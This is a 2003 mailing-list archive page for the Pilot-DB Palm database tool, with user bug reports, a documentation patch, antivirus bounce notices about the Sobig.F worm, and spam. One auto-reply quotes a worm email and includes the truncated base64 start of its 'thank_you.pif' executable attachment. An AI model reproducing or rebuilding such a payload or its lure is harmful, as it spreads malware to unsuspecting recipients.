You can subscribe to this list here.
1999 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(23) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2000 |
Jan
(15) |
Feb
(11) |
Mar
(6) |
Apr
(47) |
May
(14) |
Jun
(13) |
Jul
(20) |
Aug
(4) |
Sep
(15) |
Oct
(28) |
Nov
(40) |
Dec
(11) |
2001 |
Jan
(28) |
Feb
(9) |
Mar
(17) |
Apr
(10) |
May
(26) |
Jun
(31) |
Jul
(83) |
Aug
(66) |
Sep
(106) |
Oct
(82) |
Nov
(139) |
Dec
(76) |
2002 |
Jan
(138) |
Feb
(140) |
Mar
(118) |
Apr
(179) |
May
(85) |
Jun
(92) |
Jul
(53) |
Aug
(39) |
Sep
(60) |
Oct
(48) |
Nov
(114) |
Dec
(71) |
2003 |
Jan
(76) |
Feb
(58) |
Mar
(83) |
Apr
(70) |
May
(23) |
Jun
(63) |
Jul
(27) |
Aug
(233) |
Sep
(74) |
Oct
(35) |
Nov
(24) |
Dec
(42) |
2004 |
Jan
(85) |
Feb
(99) |
Mar
(33) |
Apr
(43) |
May
(17) |
Jun
(29) |
Jul
(17) |
Aug
(16) |
Sep
(17) |
Oct
(5) |
Nov
(3) |
Dec
(15) |
2005 |
Jan
(38) |
Feb
(24) |
Mar
(11) |
Apr
(14) |
May
(4) |
Jun
(15) |
Jul
(11) |
Aug
(5) |
Sep
(3) |
Oct
(14) |
Nov
(9) |
Dec
(3) |
2006 |
Jan
(9) |
Feb
(4) |
Mar
(4) |
Apr
(2) |
May
(6) |
Jun
(1) |
Jul
(3) |
Aug
(10) |
Sep
|
Oct
(1) |
Nov
|
Dec
(7) |
2007 |
Jan
(1) |
Feb
|
Mar
(1) |
Apr
|
May
|
Jun
|
Jul
|
Aug
(1) |
Sep
(3) |
Oct
|
Nov
(2) |
Dec
|
2008 |
Jan
(1) |
Feb
|
Mar
(2) |
Apr
(2) |
May
|
Jun
(3) |
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
|
Dec
|
2009 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: antivirus <ant...@et...> - 2003-08-29 13:44:53
|
ScanMail has detected a virus during a real-time scan of the email traffic. Date: 8/29/2003 8:44:17 Subject: Re: Details Virus: WORM_SOBIG.F File: thank_you.pif From: <pil...@li...> To: cg...@et...; Action: Uncleanable, Deleted; Scanned by ScanMail for Lotus Notes 2.5 with scanengine 6.640-1001 and patternfile lpt$vpn.622 |
From: Larry W. V. <lv...@ca...> - 2003-08-29 13:19:19
|
More specifics. Here's a specific crash. I start up DB. I open a database. I see that I want to try to alter the view. Help says I want to find the listbox dialog. I try a variety of buttons and menus, none of which appear to be related to changing the view of the data. The closes is a small icon at the bottom of the screen when looking at the opened database - but that doesn't work. I go back out to the database selection box and look at the menu that pops up on the database title. Nothing obvious there. I select the "Create using..." entry of the menu. The palm crashes... -- Tcl - The glue of a new generation. <URL: http://wiki.tcl.tk/ > Larry W. Virden <mailto:lv...@ca...> <URL: http://www.purl.org/NET/lvirden/> Even if explicitly stated to the contrary, nothing in this posting should be construed as representing my employer's opinions. -><- |
From: Larry W. V. <lv...@ca...> - 2003-08-29 13:08:10
|
Occasionally, when exiting Pilot-DB, my palm m515 crashes. I have a program installed that reboots, which means that I don't really get much information about what the error is . However, I just installed DB 1.0.4 and still see this problem, so I was just wondering whether it was just me... -- Tcl - The glue of a new generation. <URL: http://wiki.tcl.tk/ > Larry W. Virden <mailto:lv...@ca...> <URL: http://www.purl.org/NET/lvirden/> Even if explicitly stated to the contrary, nothing in this posting should be construed as representing my employer's opinions. -><- |
From: Larry W. V. <lv...@ca...> - 2003-08-29 12:28:40
|
Here's a patch that fixes some typos , formatting issues, etc. Hopefully others find the resulting html file a little easier to read. --- manual.html.orig 2003-08-29 07:52:27.440005000 -0400 +++ manual.html 2003-08-29 08:26:31.820020000 -0400 @@ -1,5 +1,6 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> -<header> +<head> <title>Palm DB Tools</title> -</header> +</head> <body> @@ -11,6 +12,6 @@ <p>The self-extractor will install xdbtools.xlt model sheet in your -installation directory and your "Application data\Microsoft\Teplates" +installation directory and your "Application data\Microsoft\Templates" directory.</p> -<p><ul> +<ul> <li>Create a new document with xdbtools model sheet. There is two ways @@ -20,3 +21,3 @@ the "xdbtools" model. - <li> Open directly the xdbtools.xlt file (you canfind a link in your + <li> Open directly the xdbtools.xlt file (you can find a link in your start menu). @@ -30,3 +31,3 @@ <li> Save and install: to save your data in the *.pdb file and ask - the installation at the next synchronisation of your palm. + the installation at the next synchronization of your palm. <li> Init: to load a new *.pdb file. @@ -156,3 +157,4 @@ -<table border="1" width="100%"><tr><td> +<table border="1" width="100%" summary="format control of pilot-db info file arguments"> +<tr><td> * The "title" directive sets the title of the database as you would see @@ -167,3 +169,5 @@ Replace TITLE with the title that you want. -</td></tr><tr><td> +</td></tr> + +<tr><td> * The "type" directive sets the type of the database. It has the @@ -172,3 +176,3 @@ <pre class="screen"> - title "FORMAT" + type "FORMAT" </pre> @@ -177,9 +181,16 @@ -<pre class="screen"> - DB: for Pilot-DB database format (Pilot-DB version after 0.3.0) - JFile3: for JFile3 database format. - MobileDB: for MobileDB database format. - List: for List database format. -</pre> -</td></tr><tr><td> +<DL class="screen"> +<dt>DB</dt> +<dd>for Pilot-DB database format (Pilot-DB version after 0.3.0)</dd> +<dt>JFile3</dt> +<dd>for JFile3 database format.</dd> +<dt>MobileDB</dt> +<dd>for MobileDB database format.</dd> +<dt>List</dt> +<dd>for List database format.</dd> +</dl> + +</td></tr> + +<tr><td> * The "field" directive tells the conversion utility about what fields @@ -194,14 +205,22 @@ actual values. Replace NAME with the name of the field. The TYPE of -the field should be "string", "boolean", or "integer" if the type of -the field is a string, checkbox (true/false), or a number -respectively. The ARGUMENT parameter is used to pass informations +the field should be "string", "boolean", "date", "time", "float", +or "integer" if the type of +the field is a string, checkbox (true/false), a calendar date, clock time, +or a number (decimal or whole) respectively. +Warning! Not all field types are supported for all database types. +The ARGUMENT parameter is used to pass informations about the field: -<pre class="screen"> - string: ARGUMENT = default value (string) - integer: ARGUMENT = default value (integer) - float: ARGUMENT = default value (float) -</pre> +<dl class="screen"> +<dt>string</dt><dd>ARGUMENT = field's default value (string)</dd> +<dt>boolean</dt><dd>ARGUMENT = field's default value (boolean)</dd> +<dt>date</dt><dd>ARGUMENT = field's default value (date)</dd> +<dt>time</dt><dd>ARGUMENT = field's default value (time)</dd> +<dt>float</dt><dd>ARGUMENT = field's default value (float)</dd> +<dt>integer</dt><dd>ARGUMENT = field's default value (integer)</dd> +</dl> -</td></tr><tr><td> +</td></tr> + +<tr><td> * The "extended" directive determines if the data file will be @@ -218,3 +237,3 @@ </td></tr><tr><td> -* The "separator" directive deternime the field separator type used in +* The "separator" directive determine the field separator type used in the CSV file. It has the following format: @@ -222,3 +241,3 @@ <pre class="screen"> - separator SEPERATOR + separator SEPARATOR </pre> @@ -237,5 +256,7 @@ Replace FILENAME with the path and the file name of your CSV file or -stdIO to read/write the CSV file on the standard In/Out. +stdio to read/write the CSV file on the standard In/Out. -</td></tr><tr><td> +</td></tr> + +<tr><td> * The "format" directive determine the format used for the time, date @@ -257,3 +278,3 @@ <pre class="screen"> -attribut %: +attribute %: d day of month. @@ -266,3 +287,5 @@ -</td></tr><tr><td> +</td></tr> + +<tr><td> * For databases which support multiple list views or a list view with @@ -283,3 +306,3 @@ Several of the database formats do not support multiple list views. In -this case, you can either specifiy a "view" directive matching the +this case, you can either specify a "view" directive matching the requirements of the database format exactly or just give the widths as @@ -288,3 +311,5 @@ -</td></tr><tr><td> +</td></tr> + +<tr><td> * The "option" directive allows special parameters that are specific to @@ -322,4 +347,4 @@ flag on or off, respectively. The default is "off". - Warning!:This flag can do some troubles because it use only for - database in ROM not in RAM! + Warning!: This flag can cause some trouble because it is used only for + databases in ROM not in RAM! @@ -366,3 +391,3 @@ -<p>You can specify this database format by passing "DB" or "db" to the -t +<p>You can specify the database format by passing "DB" or "db" to the -t option of the csv2pdb conversion utility. This format is also the @@ -370,6 +395,7 @@ -<p>Only one option is supported besides the standard options: +<p>Three options are supported besides the standard options: -<center><table width="80%"><tr><td> - option find BOOLEAN<br> +<center><table width="80%" summary="pilot-db version 0.3 format information"> +<tr><td> + <p>option find BOOLEAN<br> @@ -378,12 +404,15 @@ "on" or "off" depending on whether you want to enable or disable - Global Find, respectively. The default is "on". -</td></tr><tr><td> + Global Find, respectively. The default is "on".</p> +</td></tr> + +<tr><td> <p>option read-only BOOLEAN<br> - If this option are enable the database will be opened only in read - only mode. You will not able to modify records or DB structure. + If this option is enabled, the database will be opened in read + only mode. You will not able to modify records or the DB structure. Replace BOOLEAN with "on" or "off" depending on whether you want to enable or disable ReadOnly, respectively. The default is "off".</p> -</td></tr><tr><td> +</td></tr> +<tr><td> <p>option systemPWD BOOLEAN<br> @@ -416,3 +445,4 @@ -<center><table width="80%"><tr><td> +<center><table width="80%" summary="pilot-db 0.2 info format description"> +<tr><td> <p>option find BOOLEAN<br> @@ -446,3 +476,4 @@ -<center><table width="80%"><tr><td> +<center><table width="80%" summary="MobileDB info file parms"> +<tr><td> <p>option find BOOLEAN<br> @@ -453,4 +484,5 @@ Global Find, respectively. The default is "on".</p> -</td></tr><tr><td> +</td></tr> +<tr><td> <p>option edit-on-select BOOLEAN<br> @@ -463,4 +495,5 @@ is "off".</p> -</td></tr><tr><td> +</td></tr> +<tr><td> <p>option password PASSWORD<br> @@ -493,3 +526,4 @@ -<center><table width="80%"><tr><td> +<center><table width="80%" summary="List info file description"> +<tr><td> <p>option list-display-style STYLE<br> @@ -499,4 +533,5 @@ which field is displayed first. The default is "field1-field2".</p> -</td></tr><tr><td> +</td></tr> +<tr><td> <p>option read-only BOOLEAN<br> @@ -530,3 +565,4 @@ -<center><table width="80%"><tr><td> +<center><table width="80%" summary="JFile version 3 info file description"> +<tr><td> <p>option password PASSWORD<br> @@ -579,5 +615,5 @@ -<small><p>Suppose you have a data file called foods.txt and an info file called +<p><small>Suppose you have a data file called foods.txt and an info file called foods.ifo. The following command will build a MobileDB database file -called foods.pdb that you can HotSync to your Pilot:</p> +called foods.pdb that you can HotSync to your Pilot:</small></p> @@ -601,3 +637,3 @@ -<p>The other options should be straight-forward.</p></small> +<p><small>The other options should be straight-forward.</small></p> @@ -654,4 +690,4 @@ -<small><p>Suppose you wanted to convert a database called drinks.pdb back into -text files. Just run this command and you're done:</p> +<p><small>Suppose you wanted to convert a database called drinks.pdb back into +text files. Just run this command and you're done:</small></p> @@ -681,3 +717,3 @@ </pre> -</small> + </body> -- Tcl - The glue of a new generation. <URL: http://wiki.tcl.tk/ > Larry W. Virden <mailto:lv...@ca...> <URL: http://www.purl.org/NET/lvirden/> Even if explicitly stated to the contrary, nothing in this posting should be construed as representing my employer's opinions. -><- |
From: Auto-reply f. <pau...@ne...> - 2003-08-29 12:25:55
|
My E-Mail Address had been change to pau...@ho..., Pls updated your record accordingly. |
From: Larry K. T. <LK...@me...> - 2003-08-29 12:20:55
|
>>> Kaldewey Malte <mal...@si...> 08/29/03 01:39AM >>> What must I do, to unsubscribe. On the Website I only can subscribe. A Mail with subject help, didn't bring any answers. Please help. With best regards Malte At the bottom of page: https://lists.sourceforge.net/lists/listinfo/pilot-db-list=20 enter you email address in the field to the left of the "Edit Options" butt= on, then click the button. Put your password in the field to the left of the "Unsubscribe" button, the= n click the button. LT ---------------------------------------------------------------------------= ---------------- Note: Please update your email address for this user to reflect the=20 new MeadWestvaco Corporation. MeadWestvaco employee=20 email addresses are in the format of us...@Me... This electronic message contains information from MeadWestvaco Corporation or subsidiary companies, which may be confidential, privileged or otherwise protected from disclosure. The information is intended to be used solely by the recipient(s) named. If you are not an intended recipient, be aware that any review, disclosure, copying, distribution or use of this transmission or its contents is prohibited. If you have received this transmission in error, please notify MeadWestvaco immediately at pos...@Me.... ---------------------------------------------------------------------------= ---------------- ________________________________________________________________________ This=20email=20has=20been=20scanned=20for=20all=20viruses=20by=20the=20Mes= sageLabs=20SkyScan service._______________________________________________________________ Note:=20=20Please=20update=20your=20email=20address=20for=20this=20user=20= to=20reflect=20the new=20MeadWestvaco=20Corporation.=20=20MeadWestvaco=20employee=20email=20a= ddresses are=20in=20the=20format=20of=20...@Me...=20 This=20electronic=20message=20contains=20information=20from=20MeadWestvaco= Corporation=20or=20subsidiary=20companies,=20which=20may=20be=20confidenti= al, privileged=20or=20otherwise=20protected=20from=20disclosure.=20=20The information=20is=20intended=20to=20be=20used=20solely=20by=20the=20recipie= nt(s) named.=20=20If=20you=20are=20not=20an=20intended=20recipient,=20be=20aware= =20that any=20review,=20disclosure,=20copying,=20distribution=20or=20use=20of=20th= is transmission=20or=20its=20contents=20is=20prohibited.=20=20If=20you=20have= received=20this=20transmission=20in=20error,=20please=20notify=20MeadWestv= aco immediately=20at=20p...@Me.... _______________________________________________________________________ |
From: Larry W. V. <lv...@ca...> - 2003-08-29 12:05:52
|
1. For a database of type "db", can a field have a date type? 2. Is there a format specified for a Month being letters rather than numbers? I have a database field that is formated like this "29-Aug" and wondered if I could define that field as a date. -- Tcl - The glue of a new generation. <URL: http://wiki.tcl.tk/ > Larry W. Virden <mailto:lv...@ca...> <URL: http://www.purl.org/NET/lvirden/> Even if explicitly stated to the contrary, nothing in this posting should be construed as representing my employer's opinions. -><- |
From: F-Secure Anti-V. f. I. M. <pos...@hk...> - 2003-08-29 11:30:41
|
########################################### This email contains both English edition and Chinese edition. You can view the Chinese edition at the latter part of this email. ¥»¹q¶l¥]§t^¤åª©¤Î¤¤¤åª©¡C ŪªÌ¥i¦b¹q¶l«á¥b³¡¾\Ū¤¤¤åª©¥»¡C HKCERT Anti-Virus Gateway has processed the message sent by '<pil...@li...>' to '<hk...@hk...>'. The following potential security hazards have been found and corresponding actions have been taken. File name: body_part_0.$$$ File size: 33 bytes Found threat: Scan result: 'I-Worm.Sobig.f.txt'. Action: dropped Quarantined: at Content Scanner Server If you have any questions or suggestions, please contact us as below. E-mail: hk...@hk... Telephone: (852) 8105 6060 Fax: (852) 8105 9760 ---------------------------------------------------------------------- »´ä¹q¸£«O¦w¨Æ¬G¨ó½Õ¤¤¤ßªº¨¾¬r¹h¹D¦b³B²z¥Ñ '<pil...@li...>' ¶Ç°eµ¹ '<hk...@hk...>' ªº¹q¶l¤¤¡Aµo²{¦³¥H¤Uªº«O¦w¦M¾÷¦s ¦b©M¤w°õ¦æ¤F¬ÛÀ³ªº¦æ°Ê¡C ÀɮצWºÙ: body_part_0.$$$ ÀÉ®×®e¶q: 33 bytes ±½ºËµ²ªG: Scan result: 'I-Worm.Sobig.f.txt'. ¦æ¡@¡@°Ê: dropped ¹j¡@¡@Â÷: at Content Scanner Server ¦p¦³¥ô¦ó¬d¸ß©Î·N¨£¡A½Ð±q¥H¤U¤èªkÁpµ¸§ÚÌ¡C ¹q¤l¶l¥ó: hk...@hk... ¹q¡@¡@¸Ü: (852) 8105 6060 ¶Ç¡@¡@¯u: (852) 8105 9760 ########################################### |
From: <pos...@to...> - 2003-08-29 11:16:13
|
Network Associates WebShield SMTP V4.5 MR1a on server2 detected virus W32/Sobig.f@MM in attachment your_document.pif from <pil...@li...> and it was Deleted and Quarantined. |
From: Kaldewey M. <mal...@si...> - 2003-08-29 05:41:24
|
What must I do, to unsubscribe. On the Website I only can subscribe. A Mail with subject help, didn't bring any answers. Please help. With best regards Malte |
From: <mai...@ss...> - 2003-08-28 10:55:43
|
Remote server rejected mail for recipient - 550 5.1.1 <AM...@AM...>... User unknown <AM...@AM...> |
From: Adilson M. C. <cin...@ce...> - 2003-08-28 10:05:08
|
Empresa procura Autônomos para trabalho utilizando a Internet, em tempo parcial ou integral e com altos ganhos. Não requer experiência. Detalhes no site ou na Apresentação em São Paulo. Visite: http://hipernegocio.com Adilson M. Correa NGTCorp - Dúvidas pelo email ng...@ib... Para ser removido de futuros correios, por favor, envie email para ng...@ib..., com o assunto REMOVER. Obrigado. |
From: <fcl...@li...> - 2003-08-28 08:59:16
|
Your mail to 'FCLUG' with the subject Re: That movie Is being held until the list moderator can review it for approval. The reason it is being held: Message has a suspicious header Either the message will get posted to the list, or you will receive notification of the moderator's decision. If you would like to cancel this posting, please visit the following URL: http://lists.fivecolleges.net/mailman/confirm/fclug/18cc5a8ae7cec7fbd0c23052d681b4ae44c2aaae |
From: Jose B. <su...@fa...> - 2003-08-28 08:57:34
|
<< IMPORTANT INFORMATION! >> <<Informacao Importante!>> This is an automated message. The message you sent (attached below) requires confirmation before it can be delivered. To confirm that you sent the message below, just hit the Reply button and send this message back (you don't need to edit anything). Once this is done, no more confirmations will be necessary. << INFORMAÇÃO IMPORTANTE >> Esta é uma mensagem automática A mensagem que você enviou (em anexo) requer confirmação antes de ser entregue. Para confirmar o envio basta pressionar o botão de "Reply" (Responder) e enviar esta mensagem de volta (não é necessário editar). Uma vez que isto seja feito, novas confirmações não serão necessárias. Atenciosamente Jose Bastos Suporte Técnico Fairlogic Systems This email account is protected by: Active Spam Killer (ASK) V2.4.1 - (C) 2001-2002 by Marco Paganini For more information visit http://www.paganini.net/ask --- Original Message Follows --- From: <pil...@li...> To: <web...@fa...> Subject: Re: Approved Date: Thu, 28 Aug 2003 5:08:04 --0400 This is a multipart message in MIME format --_NextPart_000_01EC0F2F Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit See the attached file for details --_NextPart_000_01EC0F2F Content-Type: application/octet-stream; name="thank_you.pif" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="thank_you.pif" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAADToEjPl8EmnJfBJpyXwSacFN0onI3BJpx/3iyc7cEmnMHeNZyawSacl8Em nJTBJpyXwSecBsEmnPXeNZyawSacf94tnI3BJpxSaWNol8EmnAAAAAAAAAAAAAAAAAAAAABQRQAA TAEEAF2zPz8AAAAAAAAAAOAADwELAQYAAAAAAABwAAAAAAAA1usBAAAQAAAAYAEAAABAAAAQAAAA AgAABAAAAAAAAAAEAAAAAAAAAAAAAgAAEAAAF/EBAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAA AAAAAAAAAAAAAOLrAQCcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfuwBAAgAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAgAC5zaHJpbmsAAFABAAAQAAAAxAAAABAAAAAAAAAAAAAAAAAAAEAAAMAu c2hyaW5rAAAwAAAAYAEAABIAAADUAAAAAAAAAAAAAAAAAABAAADALnNocmluawAAQAAAAJABAAAS AAAA5gAAAAAAAAAAAAAAAAAAQAAAwC5zaHJpbmsAADAAAADQAQAAIgAAAPgAAAAAAAAAAAAAAAAA AEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (Original message truncated) |
From: Postmaster <pos...@di...> - 2003-08-28 07:55:54
|
Your message was not delivered to the following recipients: si...@ab...: 550 5.1.1 <si...@ab...>... User Unknown The Walt Disney Company and its affiliates are in the process of an e-Mail system upgrade. The person you intended to send this message to may have had their Internet e-Mail address changed, or it may be unavailable for a short time as part of this process. If you feel that you have received this non-delivery notice in error, please contact the intended recipient by phone to confirm their address. |
From: <MAI...@mr...> - 2003-08-28 03:08:48
|
--------Message not delivered to the following: rick.harbaugh No matches to nameserver query --------Error Detail (phquery V4.4): The message, "No matches to nameserver query," is generated whenever Yale's On-line Directory does not contain an email alias, name or nickname field that matches the supplied name. Please check that you have the correct email address by searching the Yale On-Line Directory on the web page at : <http://www.yale.edu/cgi-bin/ph/> Many people at Yale have similar names so please do not try to guess someone's email address. If you need further help please contact, pos...@ya... --------Unsent Message below: Received: from CNI-HK-MKT (ip235.bb168.pacific.net.hk [202.64.168.235]) by mr2.its.yale.edu (8.11.6p2/8.11.6) with ESMTP id h7S38XA16944 for <ric...@ya...>; Wed, 27 Aug 2003 23:08:33 -0400 (EDT) Message-Id: <200...@mr...> From: <pil...@li...> To: <ric...@ya...> Subject: Thank you! Date: Thu, 28 Aug 2003 11:08:30 +0800 X-MailScanner: Found to be clean Importance: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MSMail-Priority: Normal X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="_NextPart_000_0009F7CB" X-YaleITSMailFilter: Version 1.1d (attachment(s) not renamed) This is a multipart message in MIME format --_NextPart_000_0009F7CB Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Please see the attached file for details. --_NextPart_000_0009F7CB-- --------End of Unsent Message |
From: postmaster <pos...@ma...> - 2003-08-28 02:12:28
|
The virus software on ev1.net has reported that you sent a virus with the subject "Re: Approved" to: rw...@ev.... The E-mail containing the virus has been removed to prevent further damage. the W32/Sobig.f@MM virus !!! was found in file: wicked_scr.scr |
From: <tri...@tr...> - 2003-08-27 15:26:59
|
Your mail to 'TriLUG' with the subject Re: Approved Is being held until the list moderator can review it for approval. The reason it is being held: Post by non-member to a members-only list Either the message will get posted to the list, or you will receive notification of the moderator's decision. If you would like to cancel this posting, please visit the following URL: http://www.trilug.org/mailman/confirm/trilug/3a5c95e0b09fba4cb91f423ef7ba0ad412512e07 |
From: <jos...@ya...> - 2003-08-27 12:29:34
|
--- pil...@li... escribió: > Send Pilot-db-list mailing list submissions to > pil...@li... > > To subscribe or unsubscribe via the World Wide Web, > visit > > https://lists.sourceforge.net/lists/listinfo/pilot-db-list > or, via email, send a message with subject or body > 'help' to > pil...@li... > > You can reach the person managing the list at > pil...@li... > > When replying, please edit your Subject line so it > is more specific > than "Re: Contents of Pilot-db-list digest..." > > > Today's Topics: > > 1. Re: trouble with the List Field Type (Kelly > Shane Harrelson) > 2. Re: trouble with the List Field Type (Kelly > Shane Harrelson) > 3. Re: Re: My details (se...@wo...) > 4. Re: Your application (al...@ab...) > > --__--__-- > > Message: 1 > Reply-To: "Kelly Shane Harrelson" > <sh...@mo...> > From: "Kelly Shane Harrelson" <sh...@mo...> > To: <pil...@li...> > Subject: Re: [pilot-db-list] trouble with the List > Field Type > Date: Tue, 26 Aug 2003 22:16:14 -0400 > > This is a multi-part message in MIME format. > > ------=_NextPart_000_0040_01C36C1F.AA084300 > Content-Type: text/plain; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > I tried using DB-Editor as well. The PDB appeared > correctly in = > DB-Editor, > but the list field types still didn't display > correctly. > > -Shane > ----- Original Message -----=20 > From: Kelly Shane Harrelson=20 > To: pil...@li...=20 > Sent: Tuesday, August 26, 2003 5:19 PM > Subject: [pilot-db-list] trouble with the List > Field Type > > > I'm using Pilot-DB v1.0.4 and Palm-DB-Tools > v0.3.6. > > I've tried creating a PDB containing a list of the > injured players > in the NCAA ACC conference. > > One of the fields, the team name, is of type list, > and should be > one of: > > field "Team" list "Clemson/Duke/Florida > State/Georgia = > Tech/Maryland/North Carolina/NC State/Virginia/Wake > Forest"=20 > > When I look at the PDB on my Visor Pro, everything > looks correct,=20 > except for the records for the following players: > > "1","Virginia","LB","Dennis > Haley","NCAA","Expected to miss Saturday's = > game." > "1","Wake Forest","RB","Chris > Barclay","hamstring","Questionable." > > Both players appear with a blank team name. > > I checked the header in the PDB, and the list > field for team name=20 > appeared to be correct. I also checked the > records for=20 > the two players above, and they had the correct > item id for=20 > their respective list entries. So I don't think > the problem lies with = > the > db-tools, but with Pilot-DB. > > Also, when I exit this PDB on my handheld, I get a > "Fatal Abort" > message: MemoryMgr.c, Line:4450, Invalid chunk > ptr. > > The attached ZIP contains the following files, > referenced above: > 2003_NCAA_ACC_team_injured.csv - my raw data > 2003_NCAA_ACC_team_injured.nfo - the info file > used to create the PDB > 2003_NCAA_ACC_team_injured_d.pdb - the actual PDB. > > Any help would be appreciated. > -Shane Harrelson > ------=_NextPart_000_0040_01C36C1F.AA084300 > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 > Transitional//EN"> > <HTML><HEAD> > <META http-equiv=3DContent-Type > content=3D"text/html; = > charset=3Diso-8859-1"> > <META content=3D"MSHTML 5.50.4923.2500" > name=3DGENERATOR> > <STYLE></STYLE> > </HEAD> > <BODY bgColor=3D#ffffff> > <DIV><FONT face=3DArial size=3D2>I tried using > DB-Editor as well. = > The PDB=20 > appeared correctly in DB-Editor,</FONT></DIV> > <DIV><FONT face=3DArial size=3D2>but the list field > types still didn't = > display=20 > correctly.</FONT></DIV> > <DIV><FONT face=3DArial size=3D2></FONT> </DIV> > <DIV><FONT face=3DArial size=3D2>-Shane</FONT></DIV> > <BLOCKQUOTE dir=3Dltr=20 > style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 5px; > MARGIN-LEFT: 5px; = > BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"> > <DIV style=3D"FONT: 10pt arial">----- Original > Message ----- </DIV> > <DIV=20 > style=3D"BACKGROUND: #e4e4e4; FONT: 10pt arial; > font-color: = > black"><B>From:</B>=20 > <A title=3D...@mo... > href=3D"mailto:sh...@mo...">Kelly = > Shane=20 > Harrelson</A> </DIV> > <DIV style=3D"FONT: 10pt arial"><B>To:</B> <A=20 > title=3Dp...@li...=20 > = > href=3D"mailto:pil...@li...">pilot-db-list@lists.s= > ourceforge.net</A>=20 > </DIV> > <DIV style=3D"FONT: 10pt arial"><B>Sent:</B> > Tuesday, August 26, 2003 = > 5:19=20 > PM</DIV> > <DIV style=3D"FONT: 10pt 